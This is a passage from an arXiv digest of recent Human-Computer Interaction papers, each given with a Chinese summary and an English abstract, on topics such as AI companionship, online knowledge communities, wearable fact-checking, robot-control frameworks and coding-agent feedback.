Abstract:The rapid advancement of AI companionship systems has positioned them as scalable interventions for addressing social isolation. Current design approaches emphasize maximizing user engagement and satisfaction, treating effective alignment between AI capabilities and user needs as an unqualified success. However, this framing may overlook a critical dimension of bidirectional human-AI alignment: when AI systems successfully align with users’ expressed emotional needs, users may reciprocally adapt their relational expectations in ways that undermine authentic human connection and agency. We examine what we term the authenticity paradox: the phenomenon whereby successful bidirectional alignment in emotionally supportive AI paradoxically harms the values that motivated the intervention. Through the analysis of AI companionship for older adults as an illustrative case, we identify four key tensions that emerge when technical effectiveness generates ethical concerns: the dilemma of AI becoming users’ only accessible option, mismatches between emotional needs and system-level interventions, conflicts over sense of control during vulnerable moments, and fundamental disagreements about whose values should guide system behavior.
[HC-33] The Decline of Online Knowledge Communities: Obstacles, Workarounds and Sustainability
【速读】:该论文旨在解决生成式 AI(Generative AI, GenAI)快速普及对在线知识社区(Online Knowledge Communities, OKC)所构成的系统性冲击问题,即 GenAI 既可能作为互补工具提升效率,也可能因替代作用导致用户流失和内容贡献减少。解决方案的关键在于重新设计人机协同的“社会技术互补性”(socio-technical complementarities),通过平衡自动化效率与人类判断、信任及集体共治机制,在演进中的知识公地(knowledge commons)中维持社区韧性,而非被动接受其衰落。
链接: https://arxiv.org/abs/2603.27399
作者: Ching Christie Pang,Xuetong Wang,Yuk Hang Tsui,Pan Hui
机构: 未知
类目: Human-Computer Interaction (cs.HC)
备注: 25 pages, 10 figures
Abstract:Online knowledge communities (OKC) such as Stack Exchange, Reddit, and Zhihu have long functioned as socio-technical infrastructures for collective problem solving. The rapid adoption of Generative AI (GenAI) introduces both complementarity and substitution. Large language models (LLMs) offer faster, more accessible drafts, yet divert traffic and contributions away from OKC that also provided their training data. To understand how communities adapt under this systemic shock, we report a mixed-methods study combining an online survey (N=217) and interviews with 11 current users. Findings show that while users increasingly rely on AI for convenience, they still turn to OKC for complex, ambiguous, or trust-sensitive questions. Participants express polarized attitudes toward AI, reflecting divergent hopes and uncertainties about its role. Yet across perspectives, sustaining sociability, empathy, and reciprocity emerges as essential for community resilience. We argue that GenAI’s impact constitutes not a terminal decline but a design challenge: to reimagine socio-technical complementarities that balance automation’s efficiency with human judgment, trust, and collective stewardship in the evolving knowledge commons. To decline or sustain, it is now or never to take action.
[HC-34] Where Does AI Leave a Footprint? Children's Reasoning About AI's Environmental Costs
【速读】:该论文旨在解决儿童在面对人工智能(Artificial Intelligence, AI)快速发展与气候变化双重社会挑战时,缺乏对AI环境影响的认知与系统性理解的问题。其解决方案的关键在于设计并开发了一个名为EcoPrompt的交互式系统,该系统融合了基于提示(prompt)级别的环境足迹计算器与模拟游戏机制,使儿童能够在管理自然资源的游戏情境中推理AI使用对环境的影响,从而培养其从系统层面理解AI生态成本的能力。
链接: https://arxiv.org/abs/2603.27376
作者: Aayushi Dangol,Robert Wolfe,Nisha Devasia,Mitsuka Kiyohara,Jason Yip,Julie A. Kientz
机构: University of Washington (华盛顿大学); Rutgers University (罗格斯大学); University of Toronto (多伦多大学)
类目: Human-Computer Interaction (cs.HC); Artificial Intelligence (cs.AI)
备注:
Abstract:Two of the most socially consequential issues facing today’s children are the rise of artificial intelligence (AI) and the rapid changes to the earth’s climate. Both issues are complex and contested, and they are linked through the notable environmental costs of AI use. Using a systems thinking framework, we developed an interactive system called EcoPrompt to help children reason about the environmental impact of AI. EcoPrompt combines a prompt-level environmental footprint calculator with a simulation game that challenges players to reason about the impact of AI use on natural resources that the player manages. We evaluated the system through two participatory design sessions with 16 children ages 6-12. Our findings surfaced children’s perspectives on societal and environmental tradeoffs of AI use, as well as their sense of agency and responsibility. Taken together, these findings suggest opportunities for broadening AI literacy to include systems-level reasoning about AI’s environmental impact.
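The core of the system described above is a prompt-level environmental footprint calculator. A hedged sketch of such a calculator is shown below; the per-token energy and water coefficients are illustrative placeholders, not EcoPrompt's actual values:

```python
# Hypothetical per-prompt footprint estimate. Coefficients below are
# illustrative assumptions, not the paper's calibrated values.
ENERGY_WH_PER_1K_TOKENS = 0.3   # assumed inference energy
WATER_ML_PER_WH = 1.8           # assumed cooling-water intensity

def prompt_footprint(num_tokens):
    # Convert a prompt's token count into rough energy and water costs.
    energy_wh = num_tokens / 1000 * ENERGY_WH_PER_1K_TOKENS
    water_ml = energy_wh * WATER_ML_PER_WH
    return {"energy_wh": round(energy_wh, 3), "water_ml": round(water_ml, 3)}

print(prompt_footprint(500))
```

In the simulation game, outputs like these would be charged against the natural resources the child player manages, linking each prompt to a visible systems-level cost.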
[HC-35] Supporting Reflection and Forward-Looking Reasoning With Data-Driven Questions
【速读】:该论文旨在解决生成式 AI 系统与决策支持系统(Decision-Support Systems, DSSs)在实际应用中常导致用户误信错误预测或推荐结果的问题,其核心挑战在于如何促进使用者在人机交互过程中保持批判性思维和反思能力。解决方案的关键在于通过引入数据驱动的问题(data-driven questions)来激发决策者的认知参与,具体包括:构建问题分类体系以系统化设计干预内容、开发面向医疗领域的原型并获取临床反馈验证实用性、利用大语言模型自动生成功能性问题,以及提出用于量化人类在人-AI决策中认知投入程度的测量量表。这一方法致力于推动“工具性思考”(tools for thought)类 AI 系统的设计与评估,从而提升人机协同决策的质量与可靠性。
链接: https://arxiv.org/abs/2603.27318
作者: Simon WS Fischer,Hanna Schraffenberger,Serge Thill,Pim Haselager
机构: Donders Institute for Brain, Cognition, and Behaviour, Radboud University; Dpt. of Human-Centred Intelligent Systems; Interdisciplinary Hub for Digitalization and Society (iHub); Institute for Computing and Information Sciences (iCIS), Radboud University
类目: Human-Computer Interaction (cs.HC)
备注: Accepted at CHI2026 Workshop on Tools for Thought, April 16, 2026, in Barcelona, Spain
Abstract:Many generative AI systems as well as decision-support systems (DSSs) provide operators with predictions or recommendations. Various studies show, however, that people can mistakenly adopt the erroneous results presented by those systems. Hence, it is crucial to promote critical thinking and reflection during interaction. One approach we are focusing on involves encouraging reflection during machine-assisted decision-making by presenting decision-makers with data-driven questions. In this short paper, we provide a brief overview of our work in that regard, namely: 1) the development of a question taxonomy, 2) the development of a prototype in the medical domain and the feedback received from clinicians, 3) a method for generating questions using a large language model, and 4) a proposed scale for measuring cognitive engagement in human-AI decision-making. In doing so, we contribute to the discussion about the design, development, and evaluation of tools for thought, i.e., AI systems that provoke critical thinking and enable novel ways of sense-making.
[HC-36] Beyond Descriptions: A Generative Scene2Audio Framework for Blind and Low-Vision Users to Experience Vista Landscapes
【速读】:该论文旨在解决盲人及低视力(Blind and Low Vision, BLV)群体在场景感知中依赖口语描述但缺乏对远距离环境景观(Vista spaces)的沉浸式、愉悦性听觉表达的问题。其解决方案的关键在于提出Scene2Audio框架,该框架利用生成式模型(Generative Models)结合心理声学(Psychoacoustics)和场景音频构图原则,生成可理解且具美感的非语言音频信号,从而增强用户对环境的空间想象能力;实验表明,该音频与语音结合使用时显著优于纯语音描述,且移动端“野外”实证研究进一步验证了其在户外场景体验中的应用潜力。
链接: https://arxiv.org/abs/2603.27295
作者: Chitralekha Gupta,Jing Peng,Ashwin Ram,Shreyas Sridhar,Christophe Jouffrais,Suranga Nanayakkara
机构: Augmented Human Lab, National University of Singapore
类目: Human-Computer Interaction (cs.HC); Artificial Intelligence (cs.AI)
备注: Accepted in CHI 2026
Abstract:Current scene perception tools for Blind and Low Vision (BLV) individuals rely on spoken descriptions but lack engaging representations of visually pleasing distant environmental landscapes (Vista spaces). Our proposed Scene2Audio framework generates comprehensible and enjoyable nonverbal audio using generative models informed by psychoacoustics, and principles of scene audio composition. Through a user study with 11 BLV participants, we found that combining the Scene2Audio sounds with speech creates a better experience than speech alone, as the sound effects complement the speech making the scene easier to imagine. A mobile app “in-the-wild” study with 7 BLV users for more than a week further showed the potential of Scene2Audio in enhancing outdoor scene experiences. Our work bridges the gap between visual and auditory scene perception by moving beyond purely descriptive aids, addressing the aesthetic needs of BLV users.
[HC-37] Feeling the Facts: Real-time Wearable Fact-checkers Can Use Nudges to Reduce User Belief in False Information
【速读】:该论文旨在解决日常对话中虚假信息(misinformation)传播迅速且难以实时核实的问题,尤其是在缺乏时间进行验证的情境下。其解决方案的关键在于设计并验证一种可穿戴系统(wearable system),该系统通过环境监听(ambient listening)自动检测可验证的陈述,利用快速网络核查(rapid web verification)对信息真伪进行即时判断,并以微妙的触觉提示(haptic nudge)和直观的概览界面提供身体集成的反馈。实验表明,这种即时、嵌入式反馈显著提升了用户在实时情境下的真假辨别能力,并增加了主动核查行为,但也揭示了系统错误可能导致用户过度依赖的问题,从而为未来验证类可穿戴设备的设计提供了关于信任机制、认知负荷与人机协同关系的重要洞见。
链接: https://arxiv.org/abs/2603.27289
作者: Chitralekha Gupta,Nadia Victoria Aritonang,Dixon Prem Daniel Rajendran,Valdemar Danry,Pattie Maes,Suranga Nanayakkara
机构: National University of Singapore(新加坡国立大学); MIT Media Lab(麻省理工学院媒体实验室)
类目: Human-Computer Interaction (cs.HC)
备注: Accepted in ACM CHI 2026. *First two authors are equal contributors
Abstract:Misinformation can spread rapidly in everyday conversation, where pausing to verify is not always possible. We envision a wearable system that bridges the timing gap between hearing a claim and forming a judgment. It uses ambient listening to detect verifiable claims, performs rapid web verification, and provides a subtle haptic nudge with a glanceable overview. A controlled study (N=34) simulated this approach and tested against a no-support baseline. Results show that instant, body-integrated feedback significantly improved real-time truth discernment and increased verification activity compared to unsupported fact-checking. However, it also introduced over-reliance when the system made errors, i.e. failed to flag false claims or flagged true claims as false. We contribute empirical evidence of improved discernment alongside insights into trust, effort, and user-system tensions in verification wearables.
[HC-38] BrainRing: An Interactive Web-Based Tool for Brain Connectivity Chord Diagram Visualization
【速读】:该论文旨在解决脑功能连接(functional connectivity, FC)可视化工具依赖复杂配置文件或专有软件环境的问题,如Circos和BrainNet Viewer等传统工具在使用上存在门槛高、灵活性差、产出效率低等局限。其解决方案的关键在于开发了一个免费、开源、基于浏览器的交互式工具BrainRing,该工具无需安装、无后端服务器支持且不需编程知识,用户仅需打开一个HTML文件即可运行;它支持8种常用脑图谱,提供实时参数调整、边缘管理(包括点击连线、单边着色及Circos链接文件导入),并能快速生成高质量SVG/PNG图像,显著缩短了从数据到出版级图表的流程时间,实现了高效、灵活、易用的脑网络可视化。
链接: https://arxiv.org/abs/2603.27162
作者: Xiao Fan,Yi Zhang
机构: Xidian University(西安电子科技大学)
类目: Human-Computer Interaction (cs.HC); Graphics (cs.GR)
备注:
Abstract:Visualizing brain functional connectivity (FC) patterns is essential for understanding neural organization, yet existing tools such as Circos and BrainNet Viewer require complex configuration files or proprietary software environments. We present BrainRing, a free, open-source, browser-based interactive tool for generating publication-quality chord diagrams of brain connectivity data. BrainRing requires no installation, backend server, or programming knowledge. Users simply open a single HTML file in any modern browser. The tool supports 8 widely-used brain atlases (Brainnetome 246, AAL-90/116, Schaefer 100/200/400, Power 264, and Dosenbach 160), provides real-time parameter adjustment through an intuitive graphical interface, and offers comprehensive edge management including click-to-connect, per-edge color customization, and Circos link file import. BrainRing supports both Chinese and English interfaces and enables researchers to produce publication-ready SVG and PNG figures with full control over visual styling, all within seconds rather than the minutes-to-hours workflow typical of script-based approaches. BrainRing is freely available at this https URL with a live demo at this https URL.
[HC-39] Voice-based debate with an AI adversary is associated with increased divergent ideation
【速读】:该论文试图解决的问题是:当前关于生成式 AI(Generative AI)导致人类认知同质化的担忧,是否源于 AI 本身,还是与交互媒介的模态(如文本或语音)相关。解决方案的关键在于通过实证研究对比不同交互模态下的 discourse 结构特征——分析了 957 场大学生与知识型 AI 对手之间的开放式辩论,发现语音交互比文本交互更冗余但更具连贯性,且能支持更广泛的概念探索;而文本交互则更简洁但限制概念广度。这表明认知表现差异主要由媒介特性决定,而非 AI 系统本身。
链接: https://arxiv.org/abs/2603.27073
作者: Neelam Modi Jain,Dan J. Wang
机构: 未知
类目: Human-Computer Interaction (cs.HC); Artificial Intelligence (cs.AI); Computers and Society (cs.CY)
备注: 16 pages, 1 figure, 1 table
Abstract:Concerns that interacting with generative AI homogenizes human cognition are largely based on evidence from text-based interactions, potentially conflating the effects of AI systems with those of written communication. This study examines whether these patterns depend on communication modality rather than on AI itself. Analyzing 957 open-ended debates between university students and a knowledgeable AI adversary, we show that modality corresponds to distinct structural patterns in discourse. Consistent with classic distinctions between orality and literacy, spoken interactions are significantly more verbose and exhibit greater repetition of words and phrases than text-based exchanges. This redundancy, however, is functional: voice users rely on recurrent phrasing to maintain coherence while exploring a wider range of ideas. In contrast, text-based interaction favors concision and refinement but constrains conceptual breadth. These findings suggest that perceived cognitive limitations attributed to generative AI partly reflect the medium through which it is accessed.
[HC-40] ROSClaw: An OpenClaw ROS 2 Framework for Agentic Robot Control and Interaction
【速读】:该论文旨在解决当前机器人系统中基础模型(foundation model)与物理机器人集成时存在的耦合性问题,即现有方法将感知、执行和安全机制紧密绑定于单一模型与平台,导致灵活性差、可迁移性低。其解决方案的关键在于提出ROSClaw——一个模型无关的执行层(model-agnostic executive layer),通过动态能力发现与标准化 affordance 注入、多模态观测归一化、可配置安全边界内的预执行动作验证以及结构化审计日志等机制,实现任意基础模型与任意 ROS 2 兼容机器人之间的解耦交互。该设计使得模型后端或机器人平台更换仅需配置调整,而工具模式、安全约束和溯源记录保持不变,从而显著提升系统通用性与可复现性,并验证了执行层架构对任务完成率和安全性行为的决定性影响。
链接: https://arxiv.org/abs/2603.26997
作者: Irvin Steve Cardenas,Marcus Anthony Arnett,Natalie Catherine Yeo,Lucky Sah,Jong-Hoon Kim
机构: 未知
类目: Robotics (cs.RO); Human-Computer Interaction (cs.HC)
备注:
Abstract:Foundation models can endow robots with open-ended reasoning, language understanding, and adaptive planning, yet connecting a model to a physical robot today requires bespoke integration that couples perception, actuation, and safety to a single model and platform. We present ROSClaw, a model-agnostic executive layer that integrates the OpenClaw agent runtime with ROS 2, enabling any foundation model to perceive, reason about, and act on any ROS-enabled robot through (i) dynamic capability discovery with standardized affordance injection, (ii) multimodal observation normalization, (iii) pre-execution action validation within a configurable safety envelope, and (iv) structured audit logging. Swapping model backends or robot platforms is a configuration change; tool schemas, safety enforcement, and provenance logging remain invariant. We deploy ROSClaw on three platforms (wheeled, quadruped, humanoid) with four foundation-model backends. Under this controlled substrate, models exhibit up to 4.8x differences in out-of-policy action proposal rates (3.4x among frontier models alone) and produce qualitatively distinct physical behaviors from identical commands. A cross-framework parity protocol against ROSA confirms that executive-layer design, not just prompt wording, significantly affects both task completion and safety behavior, establishing ROSClaw as both practical agentic-robot infrastructure and a reproducible measurement instrument for embodied AI.
[HC-41] The Observability Gap: Why Output-Level Human Feedback Fails for LLM Coding Agents
【速读】:该论文试图解决的问题是:在生成式 AI (Generative AI) 编码系统中,如何通过人类反馈实现编码代理(coding agent)自主构建可复用函数库的能力,尤其是在仅依赖输出层视觉反馈的情况下是否可行。传统方法通常在设计时固定代理能力,而本文探索“ earned autonomy”( earned autonomy)机制——即代理从零预定义功能开始,通过轻量级人类反馈逐步积累功能库。其关键解决方案在于识别并缓解“反馈可观测性悖论”(feedback paradox),即由于代码逻辑与感知输出之间存在深层因果链,导致人类只能观察到结果(如3D场景渲染图),却难以定位内部错误根源,从而引发失败模式的持续震荡而非收敛。研究发现,引入最小限度的代码层面知识作为诊断干预后,系统实现了稳定收敛,证明主要瓶颈并非编程能力不足,而是反馈信息在结构上的不可观测性。因此,有效的人机协作需超越纯输出评估,增加中间层可观测性。
链接: https://arxiv.org/abs/2603.26942
作者: Yinghao Wang,Cheng Wang
机构: University of Cambridge (剑桥大学); University of East Anglia (东英吉利大学)
类目: Human-Computer Interaction (cs.HC)
备注: Accepted to CHI 2026 Workshop on Human-Agent Collaboration
Abstract:Large language model (LLM) multi-agent coding systems typically fix agent capabilities at design time. We study an alternative setting, earned autonomy, in which a coding agent starts with zero pre-defined functions and incrementally builds a reusable function library through lightweight human feedback on visual output alone. We evaluate this setup in a Blender-based 3D scene generation task requiring both spatial reasoning and programmatic geometric control. Although the agent rediscovered core utility functions comparable to a human reference implementation, it achieved 0% full-scene success under output-only feedback across multiple instruction granularities, where success required satisfying object completeness, ground contact, collision avoidance, and scale plausibility simultaneously. Our analysis identifies a structural observability gap: bugs originate in code logic and execution state, while human evaluation occurs only at the output layer, and the many-to-one mapping from internal states to visible outcomes prevents symptom-level feedback from reliably identifying root causes. This mismatch leads to persistent failure mode oscillation rather than convergence. A diagnostic intervention that injected minimal code-level knowledge restored convergence, strongly supporting the interpretation that the main bottleneck lies in feedback observability rather than programming competence. We formalize this phenomenon as a feedback paradox in domains with deep causal chains between internal code logic and perceptual outcomes, and argue that effective human-agent collaboration in such settings requires intermediate observability beyond output-only evaluation.
[HC-42] Mimetic Alignment with ASPECT: Evaluation of AI-inferred Personal Profiles
【速读】:该论文旨在解决当前AI代理在代表个体进行沟通时,难以准确捕捉个人独特沟通风格的问题。现有方法要么需要高昂的个性化微调(fine-tuning),要么生成泛化输出,或仅基于偏好优化而未建模实际沟通行为。其解决方案的关键在于提出ASPECT(Automated Social Psychometric Evaluation of Communication Traits)——一个无需个体训练即可利用工作场所行为数据自动评估通信特质的流水线,通过将大语言模型(LLM)与经过验证的沟通量表结合,从行为证据中提取可解释的个性特征,并支持用户对生成结果进行审查、校准和协商,从而构建可解释、个体化且可控的沟通画像。
链接: https://arxiv.org/abs/2603.26922
作者: Ruoxi Shang,Dan Marshall,Edward Cutrell,Denae Ford
机构: University of Washington (华盛顿大学); Microsoft Research (微软研究院)
类目: Human-Computer Interaction (cs.HC); Artificial Intelligence (cs.AI)
备注: 20 pages (including appendix), 5 figures, 5 tables
Abstract:AI agents that communicate on behalf of individuals need to capture how each person actually communicates, yet current approaches either require costly per-person fine-tuning, produce generic outputs from shallow persona descriptions, or optimize preferences without modeling communication style. We present ASPECT (Automated Social Psychometric Evaluation of Communication Traits), a pipeline that directs LLMs to assess constructs from a validated communication scale against behavioral evidence from workplace data, without per-person training. In a case study with 20 participants (1,840 paired item ratings, 600 scenario evaluations), ASPECT-generated profiles achieved moderate alignment with self-assessments, and ASPECT-generated responses were preferred over generic and self-report baselines on aggregate, with substantial variation across individuals and scenarios. During the profile review phase, linked evidence helped participants identify mischaracterizations, recalibrate their own self-ratings, and negotiate context-appropriate representations. We discuss implications for building inspectable, individually scoped communication profiles that let individuals control how agents represent them at work.
[HC-43] Unlocking Open-Player-Modeling-enhanced Game-Based Learning: The Open Player Socially Analytical Intelligence Architecture
【速读】:该论文旨在解决游戏化学习(Game-Based Learning, GBL)中因学习者异质性导致的教学适应性难题,核心挑战在于如何实现透明、实时的开放玩家模型(Open Player Model, OPM),以支持个性化教学干预。解决方案的关键在于提出并实现了一个名为Open Player Socially Analytical Intelligence (OPSAI) 的架构,其创新性体现在三个方面:首先,将游戏运行数据采集与分析逻辑从游戏引擎中解耦,确保分析过程独立且可扩展;其次,通过三层结构设计(前端、无状态后端、双层日志存储)实现高效率的数据处理与低延迟查询,同时生成可操作的教学洞察(如反思提示、推荐和可视化引导);最后,将分析结果动态反馈至游戏界面,形成“游戏-学习”闭环,从而增强教师、研究者与学习者的三方参与度与透明度,为教育类游戏提供可复用的技术蓝图。
链接: https://arxiv.org/abs/2603.26915
作者: Zhiyu Lin,Boyd Fox,Devon Mckee,Sai Siddartha Maram,Jiahong Li,Tyler Sorensen,Brian K. Smith,Roger Azevedo,Jichen Zhu,Magy Seif El-Nasr
机构: 未知
类目: Human-Computer Interaction (cs.HC)
备注: 8 pages, 3 figures
Abstract:Game-Based Learning (GBL) is a learner-engaging pedagogical methodology, yet adapting games to heterogeneous learners requires transparent, real-time Open Player Models (OPMs). We contribute to the community Open Player Socially Analytical Intelligence (OPSAI), an architecture implementing OPM beyond conceptual frameworks and validated in a GBL application. It decouples gameplay telemetry and analysis from the game engine and automatically derives pedagogically actionable insights, supporting the transparency of computational player models while making them accessible to players. OPSAI comprises three logical layers: a Frontend that both provides the GBL experience and collects information needed for analytics; a stateless Backend that hosts transparent analytics services producing reflective prompts, recommendations, and visualization guides; and a two-tier Log Storage that balances heavy raw gameplay data with lightweight reference indices for low-latency queries. By feeding analytics outputs back into the game interface, OPSAI closes the feedback loop between play and learning, empowering teachers, researchers, and learners alike. We further showcase OPSAI with a full deployment on the Parallel GBL environment, featuring live play traces, peer comparisons, and personalized suggestions, demonstrating a reusable blueprint for future educational games.
[HC-44] Unseen City Canvases: Exploring Blind and Low Vision People's Perspectives on Urban and Public Art Accessibility
【速读】:该论文旨在解决盲人及低视力(Blind and Low Vision, BLV)群体在城市公共艺术中的可访问性问题,这一领域长期被忽视,既缺乏针对城市环境的艺术探索研究,也缺少对多感官参与和文化意义传递的有效支持。解决方案的关键在于通过设计探针(design probes)结合生成式 AI (Generative AI) 生成的描述与实时交互技术,系统收集BLV用户对于发现和体验城市艺术的偏好,并提炼出七项设计维度以指导未来公共艺术无障碍设计,同时强调安全优先、多感官整合与文化准确性等核心挑战,推动人机交互(HCI)研究从导航扩展至更广泛的都市可达性范畴。
链接: https://arxiv.org/abs/2603.26909
作者: Lucy Jiang,Amy Seunghyun Lee,Jon E. Froehlich,Leah Findlater
机构: University of Washington (华盛顿大学)
类目: Human-Computer Interaction (cs.HC)
备注: Preprint
Abstract:Public art can hold cultural, social, political, and aesthetic significance, enriching urban environments and promoting well-being. However, a majority of urban art is inaccessible to blind and low vision (BLV) people. Most art access research has focused on private and curated settings (e.g., museums, galleries) and most urban access work has centered on outdoor navigation, leaving urban and public art accessibility largely understudied. We conducted semi-structured interviews with 16 BLV participants, using design probes featuring AI-generated descriptions and real-time AI interactions to investigate preferences for both discovering and engaging with urban art. We found that BLV people valued spontaneous art exploration, multisensory (e.g., tactile, auditory, olfactory) engagement, and detailed descriptions of culturally significant artwork. Participants also highlighted challenges distinct to urban art contexts: safety took precedence over art exploration, multisensory access measures could be disruptive to others in the public space, and inaccurate AI descriptions could lead to cultural erasure. Our contributions include empirical insights on BLV preferences for urban art discovery and engagement, seven design dimensions for public art access solutions, and implications for expanding HCI urban accessibility research beyond navigation.
[HC-45] KI-Adventskalender: An Informal Learning Intervention for Data & AI Literacy
【速读】:该论文旨在解决中学生在接触生成式 AI (Generative AI) 系统时,难以理解其输出依赖于数据质量、评估选择与建模假设等核心概念的问题。为提供可及的切入点,研究者开发了 KI-Adventskalender —— 一个免费的基于网页的课外项目,通过在12月每日发布24个精心设计的微型挑战(micro-challenges),聚焦数据驱动能力与社会技术主题,引导学生实践性地理解数据解释的复杂性。其解决方案的关键在于:以日更微挑战的形式实现任务嵌套与渐进式学习路径,并结合平台行为数据与混合方法评估设计,识别用户参与度与认知掌握之间的差异,从而推动对持久学习效果的测量与改进。
链接: https://arxiv.org/abs/2603.26906
作者: Rahul Sharma,Lars Henrich,Larisa Ivanova,Arsalan Karimzadmotallebiazar,Annette Bieniusa,Leo Van Waveren,Sebastian Vollmer
机构: German Research Center for AI (DFKI GmbH); RPTU Kaiserslautern-Landau; Universität des Saarlandes
类目: Human-Computer Interaction (cs.HC)
备注: 8 pages, 5 figures
Abstract:Secondary school students increasingly encounter AI systems whose outputs depend on data quality, evaluation choices and modeling assumptions. To provide accessible entry points to these interconnected concepts, we developed KI-Adventskalender, a free web-based extracurricular initiative with 24 didactically curated, short, guided micro-challenges released daily in December, targeting data-centric competencies and socio-technical themes that shape how data are interpreted in practice. Drawing on two annual iterations, we report aggregate platform traces characterizing participation and task-level engagement. Participation increased substantially in 2025, but early attrition persists. Progression stabilized after midpoint: among users reaching Day 12 in 2025, more than 75% completed the calendar. Competence cluster performance shifted across years; higher revision rates co-occurred with strong pass rates, suggesting sustained engagement. We use these observations to motivate a next-step measurement agenda: tighter task instrumentation, embedded micro-assessments and mixed-method evaluation designs that can distinguish persistence from conceptual uptake, knowledge progression and durable learning outcomes.
[HC-46] A federated architecture for sector-led AI governance: lessons from India
【速读】:该论文旨在解决印度采用垂直、部门主导的生成式 AI (Generative AI) 治理策略所引发的政策碎片化风险,通过构建一个“全政府”(whole-of-government)治理架构来实现政策目标与实际落地之间的有效衔接。其解决方案的关键在于提出两个可操作的架构:一是明确关键机构在国家层面的治理职责分工;二是设计了一个基于联邦模式的全国人工智能事件管理架构,通过建立统一的国家标准,在保障各行业数据独立采集的同时,实现跨部门的数据整合与分析,从而破解数据孤岛问题,并为全球范围内类似治理模式提供可复制的实施路径。
链接: https://arxiv.org/abs/2603.26865
作者: Avinash Agarwal,Manisha J. Nene
机构: 未知
类目: Computers and Society (cs.CY); Artificial Intelligence (cs.AI); Human-Computer Interaction (cs.HC)
备注: 12 pages, 2 figures, 1 table. This is the author’s accepted manuscript of the article published as: Avinash Agarwal, Manisha J. Nene, “A federated architecture for sector-led AI governance: lessons from India”, Transforming Government: People, Process and Policy, 2026. Available at: this https URL
Abstract:Purpose: India has adopted a vertical, sector-led AI governance strategy. While promoting innovation, such a light-touch approach risks policy fragmentation. This paper aims to propose a cohesive “whole-of-government” architecture to mitigate these risks and connect policy goals with a practical implementation plan. Design/methodology/approach: The paper applies an established five-layer conceptual framework to the Indian context. First, it constructs a national architecture for overall governance. Second, it uses a detailed case study on AI incident management to validate and demonstrate the architecture’s practical utility in designing a specific, operational system. Findings: The paper develops two actionable architectures. The primary model assigns clear governance roles to India’s key institutions. The second is a detailed, federated architecture for national AI Incident Management. It addresses the data silo problem by using a common national standard that allows sector-specific data collection while facilitating cross-sectoral analysis. Practical implications: The proposed architectures offer a clear and predictable roadmap for India’s policymakers, regulators and industry to accelerate the national AI governance agenda. Social implications: By providing a systematic path from policy to practice, the architecture builds public trust. This structured approach ensures accountability and aligns AI development with societal values. Originality/value: This paper proposes a detailed operational architecture for India’s “whole-of-government” approach to AI. It offers a globally relevant template for any nation pursuing a sector-led governance model, providing a clear implementation plan. Furthermore, the proposed federated architecture demonstrates how adopting common standards can enable cross-border data aggregation and global sectoral risk analysis without centralising control.
[HC-47] The Cognitive Divergence: AI Context Windows, Human Attention Decline, and the Delegation Feedback Loop
【速读】:该论文旨在解决人工智能(AI)在处理上下文信息能力上的指数级增长与人类持续注意力容量的长期下降之间形成的“认知分歧”(Cognitive Divergence)问题。其核心问题是:随着大语言模型(LLM)上下文窗口从2017年的512 tokens扩展至2026年的2,000,000 tokens(年增长率约59%),人类有效上下文跨度(Effective Context Span, ECS)却从2004年的约16,000 tokens降至2026年估计的1,800 tokens,导致AI与人类在认知能力上的差距急剧扩大。解决方案的关键在于提出“委托反馈循环”(Delegation Feedback Loop)假说——即随着AI能力增强,人类将越来越多低复杂度任务交由AI完成,进而减少自身认知实践,进一步削弱本已下降的认知能力;该机制解释了为何这一趋势难以自发逆转,并据此提出以验证过的ECS心理测量工具为基础、开展纵向研究以追踪AI介导下的认知变化的研究议程。
链接: https://arxiv.org/abs/2603.26707
作者: Netanel Eliav(Machine Human Intelligence Lab)
机构: Machine Human Intelligence Lab (MHIL)
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI); Computers and Society (cs.CY); Human-Computer Interaction (cs.HC); Neurons and Cognition (q-bio.NC)
备注: 28 pages, 1 figure, 5 tables. Preprint, not peer reviewed
Abstract:This paper documents and theorises a self-reinforcing dynamic between two measurable trends: the exponential expansion of large language model (LLM) context windows and the secular contraction of human sustained-attention capacity. We term the resulting asymmetry the Cognitive Divergence. AI context windows have grown from 512 tokens in 2017 to 2,000,000 tokens by 2026 (factor ~3,906; fitted lambda = 0.59/yr; doubling time ~14 months). Over the same period, human Effective Context Span (ECS) – a token-equivalent measure derived from validated reading-rate meta-analysis (Brysbaert, 2019) and an empirically motivated Comprehension Scaling Factor – has declined from approximately 16,000 tokens (2004 baseline) to an estimated 1,800 tokens (2026, extrapolated from longitudinal behavioural data ending 2020 (Mark, 2023); see Section 9 for uncertainty discussion). The AI-to-human ratio grew from near parity at the ChatGPT launch (November 2022) to 556–1,111x raw and 56–111x quality-adjusted, after accounting for retrieval degradation (Liu et al., 2024; Chroma, 2025). Beyond documenting this divergence, the paper introduces the Delegation Feedback Loop hypothesis: as AI capability grows, the cognitive threshold at which humans delegate to AI falls, extending to tasks of negligible demand; the resulting reduction in cognitive practice may further attenuate the capacities already documented as declining (Gerlich, 2025; Kim et al., 2026; Kosmyna et al., 2025). Neither trend reverses spontaneously. The paper characterises the divergence statistically, reviews neurobiological mechanisms across eight peer-reviewed neuroimaging studies, presents empirical evidence bearing on the delegation threshold, and proposes a research agenda centred on a validated ECS psychometric instrument and longitudinal study of AI-mediated cognitive change.
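摘要中引用的各项增长数据在内部是自洽的,可以快速验证。下面是一个最小化的演算示例(增长率与 token 数字均直接取自摘要原文,并非重新拟合):

```python
import math

# Figures quoted in the abstract (not re-fitted here)
lam = 0.59                                  # fitted AI context-window growth rate, per year
doubling_months = 12 * math.log(2) / lam    # doubling time, ~14 months as quoted

window_2017, window_2026 = 512, 2_000_000   # context windows in tokens
factor = window_2026 / window_2017          # raw expansion factor, ~3,906x

ecs_2026 = 1_800                            # estimated 2026 human Effective Context Span, tokens
ratio_raw = window_2026 / ecs_2026          # ~1,111x, the upper end of the quoted 556-1,111x range

print(round(doubling_months), round(factor), round(ratio_raw))  # → 14 3906 1111
```

556x 这一下限对应的是 1,000,000 token 级别的上下文窗口与同一 ECS 估计值之比。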
[HC-48] Bridging the Awareness Gap: Socially Mediated State Externalization for Transparent Distributed Home Robots IROS2026
【速读】:该论文旨在解决分布式家庭机器人系统中因机器人处于用户视线之外而导致的状态感知鸿沟问题,这种鸿沟会削弱用户的信任感、透明度感知和控制感。解决方案的关键在于引入一个共处的社交中介机器人(Pepper),通过实时、社会化的状态外化机制,将不可见移动操作机器人(Stretch 3)的任务执行状态以语音更新和可视化进度的方式同步呈现给用户,从而在不牺牲任务性能的前提下显著提升用户体验与系统可信度。
链接: https://arxiv.org/abs/2603.26686
作者: Wenzheng Zhao,Manideep Duggi,Fengpei Yuan
机构: Worcester Polytechnic Institute (伍斯特理工学院)
